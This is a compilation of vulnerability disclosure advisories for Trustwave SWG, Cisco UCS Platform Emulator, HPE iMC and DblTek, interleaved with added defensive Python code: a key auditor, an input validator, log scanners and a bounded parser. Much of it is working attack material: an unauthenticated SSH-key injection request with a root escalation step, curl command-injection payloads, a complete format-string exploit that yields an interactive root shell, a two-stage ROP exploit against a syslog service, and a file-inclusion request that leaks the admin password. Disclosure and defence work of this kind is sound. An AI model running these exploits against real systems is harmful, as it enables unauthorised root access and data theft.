Trustwave Secure Web Gateway (SWG) “provides distributed enterprises effective real-time protection against dynamic new malware, strong policy enforcement, and a unique Zero-Malware Guarantee when managed for you by our experts.”
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
Trustwave was informed of the vulnerability, and released the following advisory: https://www.trustwave.com/Resources/Trustwave-Software-Updates/Important-Security-Update-for-Trustwave-Secure-Web-Gateway/
CVE: CVE-2017-18001
## Vulnerability details
Trustwave SWG accepts, from an unauthenticated remote client, an SSH public key that the device then installs as an authorized key for logging in to it.
An unauthenticated user can submit the key with a POST request to /sendKey:
```
POST /sendKey HTTP/1.1
Host: trustwave.device:5222
Content-Length: 558
content-type: multipart/form-data
user-agent: libwww-perl/6.15
Connection: close
--xYzZY
Content-Disposition: form-data; name="publicKey"; filename="public_key_to_send"
Content-Type: text/plain
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFxLGHCIST4jLDreJoQZnIZX6Fcx/ZyM1dzR2ZSwPG7UC3GYs61/cRGFvL9yuPZwIn8f/p9MCMoKHIG1gNZu0i7pqqZgB5vL+Dbf1vXl4PLY0wwcNMyVUBJaTSHdHSqe1KGBcM/1/gMsGpgcOJw2XMNubmXZxRSFSQLca1BsDmEyPF1KVpGfk60GtEH+c5E6ScEaTP7h0NcM6zEl9gubO2R+cq9FsPcMwF4bdsxyEZYGtVdS8B4goewEt1Nj+1hAzBWGox+hySee0QshZFAvZUrfcn4TsOd1iT95jAFoIDReQn781hmT6YQBpnl7HbDp6otyXAxrsvMOg1fvriAzHv rsyncuser
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
--xYzZY--
```
This adds the supplied SSH key to the Trustwave SWG, which can then be used to log in to the device:
```
/usr/bin/ssh -q -o PasswordAuthentication=no -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o ServerAliveInterval=10 -i ./test.key commander@trustwave.device
Last login: Fri Aug 25 9:01:23 2017 from x.x.x.x
SWG Version : 11.8.0.27
SWG Maintenance Release : 0
Role : vs
Machine Type : NG-6000
```
Running the id command over SSH returns the following:
```
-sh-4.1$ id
uid=1000(rsyncuser) gid=48(apache) groups=48(apache)
```
Once connected to the Trustwave SWG via SSH, commands can be run as root through /opt/finjan/msh/run_inside.py:
```
# sudo /opt/finjan/msh/run_inside.py bash
bash-4.1# id
uid=0(root) gid=0(root) groups=0(root)
```
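When a device has been accepting keys over an unauthenticated endpoint, the defender's question is which entries in its authorized_keys files were not placed there by an administrator. The following auditor is an added example, not Trustwave code: it parses each entry, checks that the declared key type matches the type embedded in the wire-format blob, computes the OpenSSH-style SHA256 fingerprint (the same value `ssh-keygen -lf` prints) and reports every entry whose fingerprint is not on an approved list. It assumes entries without leading options (the `command=`/`from=` prefix form is not parsed); the sample file is constructed around the key shown in the request above.

```python
"""Audit an authorized_keys file against an approved-fingerprint list.
Added example, not Trustwave code. Assumes entries without leading options;
SAMPLE_AUTHORIZED_KEYS is constructed around the key from the request above."""
import base64
import hashlib
import struct
from dataclasses import dataclass
from typing import Iterator, List, Optional, Set

@dataclass
class AuthorizedKey:
    key_type: str
    fingerprint: str      # OpenSSH style: "SHA256:" + unpadded base64
    comment: str
    bits: Optional[int]   # RSA modulus size; None for other key types
    line: str

def ssh_fields(blob: bytes) -> Iterator[bytes]:
    """Split an SSH wire-format public key into its length-prefixed fields."""
    off = 0
    while off < len(blob):
        if off + 4 > len(blob):
            raise ValueError("truncated length prefix")
        (n,) = struct.unpack(">I", blob[off:off + 4])
        off += 4
        if off + n > len(blob):
            raise ValueError("field runs past end of blob")
        yield blob[off:off + n]
        off += n

def parse_authorized_key(line: str) -> AuthorizedKey:
    parts = line.split(None, 2)  # type, base64 blob, optional comment
    if len(parts) < 2:
        raise ValueError("not a key entry")
    key_type, b64 = parts[0], parts[1]
    comment = parts[2].strip() if len(parts) == 3 else ""
    blob = base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True)
    fields = list(ssh_fields(blob))
    if not fields or fields[0] != key_type.encode("ascii"):
        raise ValueError("declared type does not match the type inside the blob")
    bits = None
    if key_type == "ssh-rsa" and len(fields) == 3:  # "ssh-rsa", e, n
        bits = int.from_bytes(fields[2], "big").bit_length()
    digest = base64.b64encode(hashlib.sha256(blob).digest()).decode("ascii").rstrip("=")
    return AuthorizedKey(key_type, "SHA256:" + digest, comment, bits, line)

def unexpected_keys(authorized_keys_text: str, approved: Set[str]) -> List[AuthorizedKey]:
    """Every entry whose fingerprint is not approved, plus any entry that does
    not parse (it should not be in the file either)."""
    out = []
    for raw in authorized_keys_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        try:
            key = parse_authorized_key(line)
        except ValueError as exc:  # binascii.Error is a ValueError subclass
            out.append(AuthorizedKey("invalid", "", str(exc), None, line))
            continue
        if key.fingerprint not in approved:
            out.append(key)
    return out

# Constructed sample file: a comment line plus the key from the /sendKey request above.
SAMPLE_AUTHORIZED_KEYS = """\
# keys for the rsync/commander account
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDFxLGHCIST4jLDreJoQZnIZX6Fcx/ZyM1dzR2ZSwPG7UC3GYs61/cRGFvL9yuPZwIn8f/p9MCMoKHIG1gNZu0i7pqqZgB5vL+Dbf1vXl4PLY0wwcNMyVUBJaTSHdHSqe1KGBcM/1/gMsGpgcOJw2XMNubmXZxRSFSQLca1BsDmEyPF1KVpGfk60GtEH+c5E6ScEaTP7h0NcM6zEl9gubO2R+cq9FsPcMwF4bdsxyEZYGtVdS8B4goewEt1Nj+1hAzBWGox+hySee0QshZFAvZUrfcn4TsOd1iT95jAFoIDReQn781hmT6YQBpnl7HbDp6otyXAxrsvMOg1fvriAzHv rsyncuser
"""

if __name__ == "__main__":
    for k in unexpected_keys(SAMPLE_AUTHORIZED_KEYS, set()):
        print(k.key_type, k.bits, k.fingerprint, repr(k.comment))
```

With an empty approved set the sample yields one finding: a 2048-bit ssh-rsa key with the comment "rsyncuser", whose fingerprint can then be compared against the fingerprints an administrator actually issued.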

## Vulnerabilities Summary
The following advisory describes two remote code execution vulnerabilities found in Cisco UCS Platform Emulator version 3.1(2ePE1).
Cisco UCS Platform Emulator is the Cisco UCS Manager application bundled into a virtual machine (VM). The VM includes software that emulates hardware communications for the Cisco Unified Computing System (Cisco UCS) hardware that is configured and managed by Cisco UCS Manager. For example, you can use Cisco UCS Platform Emulator to create and test a supported Cisco UCS configuration, or to duplicate an existing Cisco UCS environment for troubleshooting or development purposes.
The vulnerabilities found in Cisco UCS Platform Emulator are:
Unauthenticated remote code execution
Authenticated remote code execution
## Credit
An independent security researcher has reported these vulnerabilities to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
The vendor has released patches to address these vulnerabilities and issued the following CVE:
CVE-2017-12243
## Vulnerabilities details
Unauthenticated remote code execution
User-controlled input is not sufficiently sanitized when passed to the /settings/ping function. An unauthenticated attacker can inject commands via the PING_NUM and PING_IP_ADDR parameters; those commands run as root on the remote machine.
## Proof of Concept
```
curl "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl -k "https://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
curl -k "https://IP/settings/ping?ping_num=1%3buname+-a%3b#&ping_ip_addr=127.0.0.1"
```
Sending one of the above requests makes the Cisco UCS respond with:
```
/sample output/
================
demo@kali:~/poc$ curl -k "http://IP/settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b#"
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.017 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.017/0.017/0.017/0.000 ms
Linux ucspe 2.6.32-431.el6.i686 #1 SMP Fri Nov 22 00:26:36 UTC 2013 i686 i686 i386 GNU/Linux
demo@kali:~/poc$ curl "http://IP/settings/ping?ping_num=1%3bid%3b#&ping_ip_addr=127.0.0.1"
uid=0(root) gid=0(root) groups=0(root)
```
Authenticated remote code execution
Cisco UCS Platform Emulator is vulnerable to a format string vulnerability that leads to remote code execution.
Cisco UCS Platform Emulator runs an SSH server by default, and a user who logs in via SSH and runs the following command:
```
show sel %x
```
gets the following response:
```
"Error: Invalid rack server value: ...somedigits.."
```
Through the “show sel” format string, the GOT entry of the _ZN7clidcos15CommandEmulator16cli_param_filterEPKc function in libsamvsh.so is overwritten with the address of libc's system().
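Both issues in this advisory are untrusted input reaching an interpreter unchecked: shell metacharacters in the ping parameters, printf directives in the "show sel" argument. The following added example (not Cisco code) shows the allowlist validation that would have stopped the first, and the same checks turned into detection over logs: a scanner for web-server access-log lines that flags /settings/ping requests the validator would refuse, and a finder for printf directives in CLI audit lines, which marks the %n and positional forms that turn a format-string bug into a memory write. The log lines are constructed around the requests and commands quoted in this advisory; the count limit and hostname rule are the example's own.

```python
"""Input validation and log detection for the two UCS Platform Emulator issues
above. Added example, not Cisco code; sample log lines are constructed around
the requests and commands quoted in the advisory."""
import ipaddress
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

HOSTNAME = re.compile(r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
                      r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")
PING_COUNT_MAX = 100  # chosen limit for this example

def validate_ping_params(ping_num: Optional[str], ping_ip_addr: Optional[str]) -> Tuple[bool, str]:
    """Allowlist check: a small integer count and an IP literal or hostname.
    Anything else (';', spaces, quotes) never reaches a shell."""
    if ping_num is None or ping_ip_addr is None:
        return False, "missing parameter"
    if not re.fullmatch(r"[0-9]{1,3}", ping_num) or not 1 <= int(ping_num) <= PING_COUNT_MAX:
        return False, f"ping_num {ping_num!r} is not an integer in 1..{PING_COUNT_MAX}"
    try:
        ipaddress.ip_address(ping_ip_addr)
        return True, "ip literal"
    except ValueError:
        pass
    if HOSTNAME.match(ping_ip_addr):
        return True, "hostname"
    return False, f"ping_ip_addr {ping_ip_addr!r} is neither an IP literal nor a hostname"

def check_ping_url(target: str) -> Tuple[bool, str]:
    """Validate the query of a request target such as /settings/ping?ping_num=...&ping_ip_addr=..."""
    parts = urlsplit(target)
    if parts.path != "/settings/ping":
        return True, "not the ping handler"
    q = parse_qs(parts.query, keep_blank_values=True)
    return validate_ping_params(q.get("ping_num", [None])[0], q.get("ping_ip_addr", [None])[0])

ACCESS_LOG = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def scan_access_log(lines: List[str]) -> List[Tuple[int, str]]:
    """Detection view over access-log lines: (line number, reason) for every
    /settings/ping request the validator would have refused."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_LOG.search(line)
        if m:
            ok, reason = check_ping_url(m.group(1))
            if not ok:
                findings.append((n, reason))
    return findings

# printf conversion; "%%" is removed first so a literal percent sign is not a hit
DIRECTIVE = re.compile(r"%(\d+\$)?[-+ 0#]*\d*(?:\.\d+)?(?:hh|h|ll|l|L|q|j|z|t)?[diouxXeEfFgGaAcspn]")

def find_format_directives(command: str) -> List[Tuple[str, bool]]:
    """(directive, writes_memory) for each printf directive in a CLI command line."""
    return [(m.group(0), m.group(0).endswith("n"))
            for m in DIRECTIVE.finditer(command.replace("%%", ""))]

# Constructed access-log lines; the request targets are the ones quoted above
# (curl drops the '#' fragment, so the server sees the query up to it).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [12/Oct/2017:10:00:01 +0000] "GET /settings/ping?ping_num=1&ping_ip_addr=127.0.0.1 HTTP/1.1" 200 311',
    '10.0.0.5 - - [12/Oct/2017:10:00:02 +0000] "GET /settings/ping?ping_num=1&ping_ip_addr=127.0.0.1%3buname+-a%3b HTTP/1.1" 200 402',
    '10.0.0.5 - - [12/Oct/2017:10:00:03 +0000] "GET /settings/ping?ping_num=1%3bid%3b HTTP/1.1" 200 50',
    '10.0.0.5 - - [12/Oct/2017:10:00:04 +0000] "GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_ACCESS_LOG))
    for cmd in ("show sel %x", "show sel %62c%28$nAAA", "show version"):
        print(repr(cmd), find_format_directives(cmd))
```

The validator is deliberately an allowlist: rejecting a list of known-bad characters is the pattern that left `;` reachable here, whereas accepting only an IP literal or a syntactically valid hostname leaves nothing for a shell to interpret.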
## Proof of Concept
To reproduce the vulnerability, follow these instructions:
Install ucspe on a VM (set up all 3 network cards) with the following user and password:
Default ucspe user : ucspe
Default ucspe pass : ucspe
Run the ucspe and write down the IP address of the ucspe (visible in the console as “Connected to IP: ….”).
In this proof of concept we will use IP 192.168.1.43.
Open up two terminals on some other machine (Kali, for example).
On the first terminal:
Create a poc directory, put poc4_ucspe_3.1.2e.py in the poc directory, and change the current directory to poc.
Create fifo1:
```
mkfifo fifo1
```
Create the output directory:
```
mkdir output
```
Run ssh with stdin redirected from fifo1 and stdout redirected to the output/log file:
```
tail -f fifo1 | ssh ucspe@192.168.1.43 > output/log
# use default credentials ucspe/ucspe
```
On the second terminal (terminal2):
Change the current directory to poc.
Run poc4_ucspe_3.1.2e.py.
The output should be:
TERMINAL1
```
demo@kali:~/poc$ mkfifo fifo1
demo@kali:~/poc$ mkdir output
demo@kali:~/poc$ tail -f fifo1 | ssh ucspe@192.168.1.43 > output/log
Pseudo-terminal will not be allocated because stdin is not a terminal.
The authenticity of host '192.168.1.43 (192.168.1.43)' can't be established.
RSA key fingerprint is SHA256:qEdgqNFyfqA2BU1+cH9rmYrsIOiQr/NlCpgAyzrX70Y.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.43' (RSA) to the list of known hosts.
uucspe@192.168.1.43's password:
TERM environment variable not set.
```
TERMINAL2
```
demo@kali:~/poc$ python poc4_ucspe_3.1.2e.py
Going through some menus please wait a moment..
You should now see on the other terminal message simmilar to "Error: Already in local-mgmt shell.."
[.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&) addres from libsamvsh.so
-> 0x6b9f64
[.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt
-> 0x6d7a70
[.] Dumping snprintf address from libc
-> 0x7791210
[.] Calculating libc system address
-> libc base addr = 0x7746000
-> system addr = 0x7780f60
[.] Sending payload..
show sel %62c%28$nAAA
show sel %237c%28$nAA
show sel %86c%28$nAAA
show sel %229c%28$nAA
Sleep for fork adjustment..
Ok please type your commands (type exit for exit)
> id
['uid=0(root) gid=0(root) groups=0(root)']
>
```
poc4_ucspe_3.1.2e.py
```
import struct
import time
import binascii


def generate_payload(addr):
    basepayload = "show sel AAAAAAAAAAAA"
    aa = (addr >> 24 & 0xff)
    bb = (addr >> 16 & 0xff)
    cc = (addr >> 8 & 0xff)
    dd = (addr >> 0 & 0xff)
    if aa < 34:
        aa_c_payload = aa + 222
    else:
        aa_c_payload = aa - 34
    if bb < 34:
        bb_c_payload = bb + 222
    else:
        bb_c_payload = bb - 34
    if cc < 34:
        cc_c_payload = cc + 222
    else:
        cc_c_payload = cc - 34
    if dd < 34:
        dd_c_payload = dd + 222
    else:
        dd_c_payload = dd - 34
    aa_payload = "%" + str(aa_c_payload) + "c%28$n"
    bb_payload = "%" + str(bb_c_payload) + "c%28$n"
    cc_payload = "%" + str(cc_c_payload) + "c%28$n"
    dd_payload = "%" + str(dd_c_payload) + "c%28$n"
    aap = basepayload[:9] + aa_payload + basepayload[len(aa_payload) + 9:]
    bbp = basepayload[:9] + bb_payload + basepayload[len(bb_payload) + 9:]
    ccp = basepayload[:9] + cc_payload + basepayload[len(cc_payload) + 9:]
    ddp = basepayload[:9] + dd_payload + basepayload[len(dd_payload) + 9:]
    return [aap, bbp, ccp, ddp]


def clearlog():
    fo = open("output/log", "w")
    fo.truncate()
    fo.close()


def readlog():
    # strip newline and NUL only; the original '\n\0x00' also stripped 'x' and '0'
    # from the ends of lines, which can truncate a leaked value
    logread = [line.strip('\n\x00') for line in open('output/log')]
    return logread


def sendcommand(cmd):
    f = open("fifo1", "a+")
    f.write(cmd + "\n")
    f.close()


def dump(adr, frmt='p'):
    clearlog()
    leak_part = "show sel %28${}".format(frmt)
    raw_addr = struct.pack("I", adr)
    if "\x20" in raw_addr:
        print "space!"
    out = leak_part + "AAAAAAA" + raw_addr
    sendcommand(out)
    time.sleep(2)
    e = readlog()[0]
    outbin = e.split("AAAAAAA")[0].split(": ")[2]
    clearlog()
    return outbin + "\x00"


def starting_point():
    clearlog()
    out = "show sel %147$x"
    sendcommand(out)
    time.sleep(2)
    e = readlog()[0]
    outbin = e.split("AAAAAAA")[0].split(":")[2]
    clearlog()
    return outbin


clidcos_step = 0x1DB0C
libc_emulator_snprintf = 0x0004b210
libc_emulator_system = 0x0003af60

print "Going through some menus please wait a moment.."
sendcommand("c")
time.sleep(1)
sendcommand("show version")
time.sleep(1)
sendcommand("connect local-mgmt")
time.sleep(1)
sendcommand("connect local-mgmt")
time.sleep(1)
sendcommand("show version")
time.sleep(5)
clearlog()
print "You should now see on the other terminal message simmilar to \"Error: Already in local-mgmt shell..\" "

print "[.] Dumping clicli::LocalMgmtSel::show(void*, base::String const&) addres from libsamvsh.so"
off3 = int(starting_point(), 16)
print " -> " + hex(off3)

print "[.] Calculating _ZN7clidcos15CommandEmulator16cli_param_filterEPKc .got.plt"
clidcosGOTPLT = off3 + clidcos_step
print " -> " + hex(clidcosGOTPLT)

print "[.] Dumping snprintf address from libc"
libc_printf = dump(clidcosGOTPLT + 8, 's')[:4]
libc_tmp1_hex = binascii.hexlify(libc_printf[::-1])
libc_snprintf_addr = int(libc_tmp1_hex, 16)
print " -> " + hex(libc_snprintf_addr)

print "[.] Calculating libc system address"
libc_base_addr = libc_snprintf_addr - libc_emulator_snprintf
print " -> libc base addr = " + hex(libc_base_addr)
libc_system_addr = libc_base_addr + libc_emulator_system
print " -> system addr = " + hex(libc_system_addr)

print "\n[.] Sending payload.."
sendcommand(generate_payload(libc_system_addr)[3] + struct.pack("I", clidcosGOTPLT))
print generate_payload(libc_system_addr)[3]
sendcommand("show version")
time.sleep(1)
sendcommand(generate_payload(libc_system_addr)[2] + struct.pack("I", clidcosGOTPLT + 1))
print generate_payload(libc_system_addr)[2]
sendcommand("show version")
time.sleep(1)
sendcommand(generate_payload(libc_system_addr)[1] + struct.pack("I", clidcosGOTPLT + 2))
print generate_payload(libc_system_addr)[1]
sendcommand("show version")
time.sleep(1)
sendcommand(generate_payload(libc_system_addr)[0] + struct.pack("I", clidcosGOTPLT + 3))
print generate_payload(libc_system_addr)[0]
sendcommand("show version")
time.sleep(1)

print "Sleep for fork adjustment.."
time.sleep(5)
sendcommand("ssh /bin/bash")
print "Ok please type your commands (type exit for exit)"
time.sleep(2)
while True:
    n = raw_input("> ")
    if 'exit' in n:
        break
    clearlog()
    sendcommand(n)
    time.sleep(2)
    print readlog()
```

## Vulnerability Summary
The following advisory describes a stack buffer overflow vulnerability found in HPE Intelligent Management Center version 7.2 (E0403P10) Enterprise; the vulnerability leads to an exploitable remote code execution.
HPE Intelligent Management Center (iMC) delivers comprehensive management across campus core and data center networks. iMC converts meaningless network data to actionable information to keep your network, and your business, moving.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
HPE has released a patch to address this vulnerability and issued CVE-2017-5815.
## Vulnerability Details
HPE Intelligent Management Center (iMC) is vulnerable to a stack buffer overflow that leads to remote code execution. The imcsyslogdm service handles syslog messages received on UDP port 514.
The imcsyslogdm service handles forwarded messages by using the FORWARD_HEAD (Forwarded From:) and FORWARD_HEAD_END (Quidview) markers at the beginning of the packet to indicate the originator of the syslog message. If there is a FORWARD_HEAD marker but no FORWARD_HEAD_END, the application ends up copying the contents of the packet into a fixed-size stack buffer, which overflows.
## Proof of Concept
The first stage of the proof of concept triggers the overflow and starts a ROP chain by sending data to UDP port 514. The application also binds UDP port 65535 but does not seem to use it. After the buffer overflow is triggered, the exploit needs the file descriptor of this socket; its number is 27 most of the time and occasionally 28. To avoid this non-determinism, the ROP chain retrieves the file descriptor number from the singleton instance holding it.
It then reads 0x25f bytes into the .bss and pivots the stack there. The second stage contains another ROP chain, the command to be executed, and some helper strings. It resolves the address of system in libc via dlopen and dlsym, executes the command via system, and ends in an infinite loop. The command length is currently limited to ~470 bytes (the exploit checks for this) but could be extended.
While termination is avoided this way, this thread is responsible for handling syslog messages, so that function of the program will be broken.
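The framing bug is that the search for FORWARD_HEAD_END has no bound, so a packet carrying only FORWARD_HEAD is copied in full into a fixed-size buffer. A bounded parser for that framing follows as an added example (not HPE's code): the two marker strings are the advisory's, while the layout between them (originator text between FORWARD_HEAD and FORWARD_HEAD_END, the syslog payload after) and the 255-byte limit are assumptions of the example. It refuses a packet whose END marker is absent or beyond the limit instead of copying it, and exposes those refusals as a detection view, which is also the signal a network sensor would raise for this vector.

```python
"""Bounded parser for the forwarded-syslog framing described above.
Added example, not HPE code; the marker strings are from the advisory, the
layout between them and the length limit are assumptions of this example."""
from typing import List, Optional, Tuple

FORWARD_HEAD = b"Forwarded From:"
FORWARD_HEAD_END = b"Quidview"
MAX_ORIGINATOR = 255  # assumed bound on the originator field

class FramingError(ValueError):
    """A packet that opens a forwarded frame but never closes it within bounds."""

def parse_forwarded(packet: bytes) -> Tuple[Optional[str], bytes]:
    """Return (originator, syslog payload); originator is None for a plain message.
    The END marker is searched only within the first MAX_ORIGINATOR bytes after
    HEAD, so the header can never be copied unbounded."""
    if not packet.startswith(FORWARD_HEAD):
        return None, packet
    body = packet[len(FORWARD_HEAD):]
    end = body.find(FORWARD_HEAD_END, 0, MAX_ORIGINATOR + len(FORWARD_HEAD_END))
    if end < 0:
        raise FramingError(
            f"FORWARD_HEAD without FORWARD_HEAD_END in the first {MAX_ORIGINATOR} bytes")
    originator = body[:end].decode("ascii", "replace").strip()
    return originator, body[end + len(FORWARD_HEAD_END):]

def detect_malformed(packets: List[bytes]) -> List[Tuple[int, str]]:
    """Detection view: (index, reason) for every datagram the parser refuses."""
    findings = []
    for i, pkt in enumerate(packets):
        try:
            parse_forwarded(pkt)
        except FramingError as exc:
            findings.append((i, str(exc)))
    return findings

# Constructed sample datagrams: plain, well-formed forwarded, HEAD without END,
# and END placed beyond the bound.
SAMPLE_PACKETS = [
    b"<34>Oct 11 22:14:15 host app: plain message",
    FORWARD_HEAD + b" 10.0.0.7 " + FORWARD_HEAD_END + b"<34>Oct 11 22:14:15 host app: forwarded",
    FORWARD_HEAD + b"A" * 2000,
    FORWARD_HEAD + b"B" * 300 + FORWARD_HEAD_END + b"<34>late end",
]

if __name__ == "__main__":
    for pkt in SAMPLE_PACKETS[:2]:
        print(parse_forwarded(pkt))
    print(detect_malformed(SAMPLE_PACKETS))
```

The point of the bounded find() is that the decision about how much header to accept is made before any copy happens; the vulnerable code makes it after, when the fixed-size buffer has already overflowed.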
```
#!/usr/bin/env python2
import socket
import struct

IP = '192.168.0.20'
PORT = 514

# the command to execute
command = 'echo "OK GOOGLE!" > /etc/issue ; #\0'

# port to use for the second stage payload, this is created during normal operation
# of the application, we just reuse it because there's no other thread waiting on it
# like in the case of the initial udp/514 vector, which could interfere with sending
# the second stage
PORT_SECOND_STAGE = 65535

# markers used for forwarded syslog messages
SYSLOG_FORWARD_HEAD = 'Forwarded From:'
SYSLOG_FORWARD_HEAD_END = 'Quidview'


def rop(*args):
    return struct.pack('I' * len(args), *args)


# mock object of the ELF class from pwntools so that the final exploit doesn't depend on it
class ELF:
    def bss(self, offset):
        return 0x884D0C0 + offset

    plt = {
        'read': 0x805957C,
        'dlopen': 0x805857C,
        'dlsym': 0x80597BC,
    }


e = ELF()

# strings used in the second stage
libc_str = 'libc.so.6\0'
system_str = 'system\0'

# ROP gadgets from the latest available version:
# (Intelligent Management Center Enterprise (7.2_E0403) with E0403P10 applied
# [root@vm bin]# md5sum imcsyslogdm
# 8b06adbd3d47a372358d9106e659d9b2  imcsyslogdm
pop2_ret = 0x0805b137  # pop edi ; pop ebp ; ret
pop3_ret = 0x08480408  # pop edi ; pop ebx ; pop ebp ; ret
pop4_ret = 0x084f213a  # pop edi ; pop esi ; pop ebx ; pop ebp ; ret
zero_edx = 0x084f90c1  # xor edx, edx ; ret
inc_edx = 0x0811c5e6  # inc edx ; ret
pop_ebx = 0x080dd8cd  # pop ebx ; ret
# used to write values obtained dynamically by the ROP chain to the stack
eax_to_stack = 0x08703fba  # mov dword ptr [esp + edx*8], eax ; adc dword ptr [ebx], eax ; ret
ret = 0x080485c0  # ret
add_eax_28 = 0x084ddd16  # add eax, 0x1c ; pop ebp ; ret
dec_eax = 0x080dd660  # dec eax ; ret
zero_eax = 0x080834d4  # xor eax, eax ; ret
add_eax_25f = 0x0845f636  # add eax, 0x25f ; pop ebx ; pop ebp ; ret
ret_C = 0x0814b04e  # ret 0xc
xchg_eax_esp = 0x0807a2c7  # xchg eax, esp ; ret
pop_eax = 0x0837db70  # pop eax ; ret
get_instance = 0x08091210  # ::instance of a Singleton used to retrieve a socket fd
mov_eax_eax_plus_0x5c = 0x08562d44  # mov eax, dword ptr [eax + 0x5c] ; ret

# the offset of the second stage into the .bss
second_stage_offset_into_bss = 0x6500
second_stage_data = libc_str + system_str + command
# place the data above the rop chain so that the stack usage of functions
# won't clobber it. Also, the second ROP chain has to be shorter than this.
second_stage_data_offset = 120
# the length of the command to be executed is limited to around 470 bytes
assert len(command) < 0x25f - second_stage_data_offset - len(system_str) - len(libc_str)

# the first stage has to be 0-byte free, so we do as little as possible here to read in a second stage
first_stage = rop(
    # the stack write gadget (`eax_to_stack` above) writes eax to [esp + edx*8]
    zero_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    pop_ebx,
    # points somewhere in the bss, just needs to be writable for the eax_to_stack gadget
    e.bss(0x5fc0),
    # the second stage goes to udp/65535, which the application binds but doesn't
    # seem to use for anything. The only thing not completely deterministic in the exploit
    # is the fd number of this port, which seems to be quite reliably 27 but sometimes 28.
    # We get its fd from a class member, and we get the class via a singleton ::instance function.
    # [root@vm bin]# lsof | grep syslog | grep UDP | grep 65535
    # imcsyslog 24741 root 27u IPv4 39655685 0t0 UDP *:65535
    get_instance,
    mov_eax_eax_plus_0x5c,
    eax_to_stack,  # write the handle to the stack
    # write the read count to the stack
    zero_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    inc_edx,
    zero_eax,
    add_eax_25f,
    # picked up by the above into ebx, written to by eax_to_stack, just needs to be writable
    e.bss(second_stage_offset_into_bss - 0x80),
    0x41414141,
    eax_to_stack,  # write the handle to the stack
    ret_C,
    e.plt['read'],
    0x41414141, 0x41414141, 0x41414141,
    pop3_ret,
    0x41414141,  # placeholder for the fd of udp/65535
    e.bss(second_stage_offset_into_bss),
    0x41414141,  # placeholder for the read count
    pop_eax,
    e.bss(second_stage_offset_into_bss),
    xchg_eax_esp
)
assert '\0' not in first_stage

print('* Sending first stage to udp/514')
# print repr(first_stage)
s_514 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s_514.sendto(SYSLOG_FORWARD_HEAD + 'A'*48 + first_stage + '\0',
             (IP, PORT))
s_514.close()

# the second stage does a dlopen/dlsym to get the address of the system function,
# then executes the given command via it.
second_stage = rop(
    e.plt['dlopen'],  # get libc handle
    pop2_ret,
    e.bss(second_stage_offset_into_bss + second_stage_data_offset),
    2,  # RTLD_NOW (why not)
    # write the returned handle to the stack
    zero_edx,
    inc_edx,
    pop_ebx,
    e.bss(second_stage_offset_into_bss - 0x80),  # somewhere in the bss
    eax_to_stack,  # write the handle to the stack
    e.plt['dlsym'],
    pop2_ret,
    0x41516171,  # placeholder, libc handle is written here
    e.bss(second_stage_offset_into_bss + second_stage_data_offset + len(libc_str)),  # address is 'system' string
    # write the returned address to the stack
    zero_edx,
    inc_edx,
    pop_ebx,
    e.bss(second_stage_offset_into_bss - 0x80),  # somewhere in the bss
    eax_to_stack,  # write the handle to the stack
    ret,
    ret,
    0x51617181,  # placeholder, the address of system gets written here
    0x854ae76,  # continuation of execution: a simple infinite loop of 0xeb 0xfe
    e.bss(second_stage_offset_into_bss + second_stage_data_offset + len(libc_str) + len(system_str))
)

print('* Sending second stage to udp/65535')
# print repr(second_stage)
second_stage_final = second_stage.ljust(second_stage_data_offset) + second_stage_data
s_65535 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s_65535.sendto(second_stage_final.ljust(0x25f), (IP, PORT_SECOND_STAGE))
s_65535.close()

print('! Done.')
```

## Vulnerabilities summary
The following advisory describes 2 (two) vulnerabilities found in DblTek webserver.
DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 16, and 32-channel in order to meet the wide range of market demands. All our products are priced very attractively and probably the lowest in the market. Because of the price and performance, GoIPs have been widely adopted by system integrators, VoIP service providers, and many other business and individual users.”
The vulnerabilities found are:
- Pre-authentication Information Disclosure
- Command Execution
It is possible to combine the 2 vulnerabilities and gain unauthenticated remote command execution.
## Credit
An independent security researcher has reported this vulnerability to Beyond Security's SecuriTeam Secure Disclosure program.
## Vendor response
DblTek has released patches to address those vulnerabilities.
CVE-2017-16934
## Vulnerabilities details
User-controlled input is not sufficiently sanitized and can trigger local file inclusion.
By sending a GET request for /dev/mtdblock/5, an attacker can download the configuration file, which contains the admin password:
```
GET /default/en_US/frame.html?content=/dev/mtdblock/5
```
